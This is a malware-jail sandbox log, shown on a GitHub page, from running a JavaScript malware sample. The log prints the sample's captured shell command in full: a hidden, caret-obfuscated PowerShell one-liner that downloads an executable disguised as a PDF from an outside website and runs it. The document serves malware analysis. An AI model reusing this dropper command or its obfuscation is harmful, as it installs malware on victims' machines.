-
Notifications
You must be signed in to change notification settings - Fork 97
/
Copy path5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.out
24 lines (24 loc) · 5.64 KB
/
5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.out
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
14 Dec 20:24:03 - mailware-jail, a malware sandbox ver. 0.10
14 Dec 20:24:03 - ------------------------
14 Dec 20:24:03 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/other.js,env/console.js
14 Dec 20:24:03 - Malware files: malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js
14 Dec 20:24:03 - Output file for sandbox dump: sandbox_dump_after.json
14 Dec 20:24:03 - Output directory for generated files: output/
14 Dec 20:24:03 - ==> Preparing Sandbox environment.
14 Dec 20:24:03 - => Executing: env/utils.js quitely
14 Dec 20:24:03 - => Executing: env/eval.js quitely
14 Dec 20:24:03 - => Executing: env/function.js quitely
14 Dec 20:24:03 - => Executing: env/wscript.js quitely
14 Dec 20:24:03 - => Executing: env/other.js quitely
14 Dec 20:24:03 - => Executing: env/console.js quitely
14 Dec 20:24:03 - ==> Executing malware file(s). =========================================
14 Dec 20:24:03 - => Executing: malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js verbosely, reporting silent catches
14 Dec 20:24:03 - Saving: output/malware_20161214_5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js
14 Dec 20:24:03 - WScript.scriptfullname = (string) 'malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js'
14 Dec 20:24:03 - WScript.arguments = (object) 'malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js,xyz'
14 Dec 20:24:03 - ActiveXObject(wscript.shell)
14 Dec 20:24:03 - new WScript.Shell[2]
14 Dec 20:24:03 - WScript.Shell[2].Run(cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden $migipk='^$';$kqevovde='^p';$unub='^a';$tygnefb='^t';$sbixeg='^h';$tecgerz='^=';$eryse='^(';$avkuvynb='^$';$qzarach='^e';$ciwyro='^n';$ulmezyq='^v';$ymqumnyzj='^:';$bmohetm='^t';$sideq='^e';$jevefbi='^m';$svepqa='^p';$ulvymu='^+';$kaqsa='^''';$izafso='^.';$wlohosky='^e';$silpox='^x';$aqselev='^e';$levfima='^''';$owaqij='^)';$omyjs='^;';$ahzujf='^(';$omitadk='^N';$arybom='^e';$usnakdipt='^w';$unar='^-';$zype='^O';$ezbaxnaj='^b';$otuxxep='^j';$iquxdo='^e';$uchaquf='^c';$ycydnez='^t';$ftyrbi='^ ';$uljenby='^S';$ywacjy='^y';$oxop='^s';$qibragd='^t';$ravafy='^e';$ogavo='^m';$evewzars='^.';$ygwavu='^N';$ulzuvuz='^e';$ulydo='^t';$irkufipd='^.';$abyhy='^W';$fdoggosdi='^e';$have='^b';$gyjacy='^c';$ywelzikl='^l';$mbiwja='^i';$ijif='^e';$soka='^n';$tdytkud='^t';$qubcagk='^)';$avmyf='^.';$kosev='^D';$lolrowbe='^o';$apas='^w';$yvbujo='^n';$otelwuw='^l';$dsobehhu='^o';$oqav='^a';$odbujqypz='^d';$elcyxcyh='^F';$kezdywt='^i';$hcogwo='^l';$jvuhyvj='^e';$afac='^(';$lvutykpu='^''';$qfyctyva='^h';$acwihge='^t';$fizju='^t';$npynep='^p';$ugnevlek='^:';$ugavcy='^/';$rfatcyw='^/';$dujy='^w';$parasy='^w';$opujy='^w';$gtupe='^.';$aprokpal='^k';$abwysy='^i';$agmif='^t';$nheqysje='^d';$ahybt='^o';$yskanagq='^o';$ajrewnasj='^r';$ebvonwukw='^s';$kcokiz='^.';$foby='^r';$mfobjof='^u';$ucim='^/';$xodedbi='^w';$xkyrniplo='^p';$nzolo='^-';$dqycoxo='^c';$cjyxkowm='^o';$wevcish='^n';$csipy='^t';$mvevdiz='^e';$ebezby='^n';$dpedga='^t';$olnozz='^/';$esgafa='^u';$ykix='^p';$quldar='^l';$egxex='^o';$zybgify='^a';$owbudlap='^d';$owlolo='^s';$osbuzbe='^/';$jytykq='^2';$vjesucle='^0';$alduzav='^1';$umijy='^4';$kicni='^/';$ywerho='^0';$murewpo='^1';$urufemc='^/';$ibqehr='^b';$yjixbu='^8';$vozu='^l';$uvaw='^k';$ubawak='^i';$ipfutem='^f';$rutod='^n';$ekaw='^z';$edtafta='^d';$inawy='^/';$ajfegqo='^C';$ufocu='^o';$equst='^u';$zohuza='^p';$dhawo='^o';$nwipikh='^n';$cywiw='^9';$qgochedw='^8';$fyndik='^5';$uqeda='^4';$juqaty='^.';$yftifoqw='^p';$sawvif='^d';$dtomu='^f';$yshyxik='^''';$pekretv='^,';$xxavludb='^$';$yrjely='^p';$enuke='^a';$xasmopo='^t';$osybho='^h';$zdomum='^)';$trawomo='^;';$loreh='^ ';$qalci='^S';$dqynnof='^t';$ppysy='^a';$zkytbeb='^r';$ovelf='^t';$lajkixa='^-';$fsebi='^P';$ukpab='^r';$lkura='^o';$rfukopn='^c';$ttawefa='^e';$preffojja='^s';$hlofejqu='^s';$yxnefka='^ ';$fwapywj='^$';$mydri='^p';$cape='^a';$ckukxoq='^t';$kbewifn='^h'; Invoke-Expression ($migipk+$kqevovde+$unub+$tygnefb+$sbixeg+$tecgerz+$eryse+$avkuvynb+$qzarach+$ciwyro+$ulmezyq+$ymqumnyzj+$bmohetm+$sideq+$jevefbi+$svepqa+$ulvymu+$kaqsa+$izafso+$wlohosky+$silpox+$aqselev+$levfima+$owaqij+$omyjs+$ahzujf+$omitadk+$arybom+$usnakdipt+$unar+$zype+$ezbaxnaj+$otuxxep+$iquxdo+$uchaquf+$ycydnez+$ftyrbi+$uljenby+$ywacjy+$oxop+$qibragd+$ravafy+$ogavo+$evewzars+$ygwavu+$ulzuvuz+$ulydo+$irkufipd+$abyhy+$fdoggosdi+$have+$gyjacy+$ywelzikl+$mbiwja+$ijif+$soka+$tdytkud+$qubcagk+$avmyf+$kosev+$lolrowbe+$apas+$yvbujo+$otelwuw+$dsobehhu+$oqav+$odbujqypz+$elcyxcyh+$kezdywt+$hcogwo+$jvuhyvj+$afac+$lvutykpu+$qfyctyva+$acwihge+$fizju+$npynep+$ugnevlek+$ugavcy+$rfatcyw+$dujy+$parasy+$opujy+$gtupe+$aprokpal+$abwysy+$agmif+$nheqysje+$ahybt+$yskanagq+$ajrewnasj+$ebvonwukw+$kcokiz+$foby+$mfobjof+$ucim+$xodedbi+$xkyrniplo+$nzolo+$dqycoxo+$cjyxkowm+$wevcish+$csipy+$mvevdiz+$ebezby+$dpedga+$olnozz+$esgafa+$ykix+$quldar+$egxex+$zybgify+$owbudlap+$owlolo+$osbuzbe+$jytykq+$vjesucle+$alduzav+$umijy+$kicni+$ywerho+$murewpo+$urufemc+$ibqehr+$yjixbu+$vozu+$uvaw+$ubawak+$ipfutem+$rutod+$ekaw+$edtafta+$inawy+$ajfegqo+$ufocu+$equst+$zohuza+$dhawo+$nwipikh+$cywiw+$qgochedw+$fyndik+$uqeda+$juqaty+$yftifoqw+$sawvif+$dtomu+$yshyxik+$pekretv+$xxavludb+$yrjely+$enuke+$xasmopo+$osybho+$zdomum+$trawomo+$loreh+$qalci+$dqynnof+$ppysy+$zkytbeb+$ovelf+$lajkixa+$fsebi+$ukpab+$lkura+$rfukopn+$ttawefa+$preffojja+$hlofejqu+$yxnefka+$fwapywj+$mydri+$cape+$ckukxoq+$kbewifn);;, 0, undefined)
14 Dec 20:24:03 - ==> Cleaning up sandbox.
14 Dec 20:24:03 - ==> Script execution finished, dumping sandbox environment to a file.
14 Dec 20:24:03 - The sandbox context has been saved to: sandbox_dump_after.json